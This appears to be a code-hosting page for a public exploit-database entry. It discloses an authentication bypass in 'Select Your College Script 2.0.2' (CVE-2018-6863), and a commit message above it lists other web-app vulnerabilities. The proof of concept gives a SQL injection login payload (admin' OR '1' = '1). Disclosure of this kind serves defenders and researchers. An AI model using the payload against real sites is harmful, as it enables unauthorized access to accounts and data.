8d28b02dc1
9 changes to exploits/shellcodes JBoss 4.2.x/4.3.x - Information Disclosure Naukri Clone Script 3.0.3 - 'indus' SQL Injection Facebook Clone Script 1.0.5 - Cross-Site Scripting Schools Alert Management Script 2.0.2 - Arbitrary File Upload Lawyer Search Script 1.0.2 - Cross-Site Scripting Bitcoin MLM Software 1.0.2 - Cross-Site Scripting Select Your College Script 2.0.2 - Authentication Bypass Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting Multi Language Olx Clone Script - Cross-Site Scripting
18 lines
No EOL
731 B
Text
18 lines
No EOL
731 B
Text
######################################################################################
|
|
# Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass
|
|
# Date: 07.02.2018
|
|
# Vendor Homepage: https://www.phpscriptsmall.com/
|
|
# Software Link:https://www.phpscriptsmall.com/product/select-your-college-script/
|
|
# Category: Web Application
|
|
# Exploit Author: Prasenjit Kanti Paul
|
|
# Web: http://hack2rule.wordpress.com/
|
|
# Version: 2.0.2
|
|
# Tested on: Linux Mint
|
|
# CVE: CVE-2018-6863
|
|
#######################################################################################
|
|
|
|
Proof of Concept
|
|
|
|
1. Goto login page
|
|
2. put [admin' OR '1' = '1] as user and password field
|
|
3. You will be logged in as an authenticated user |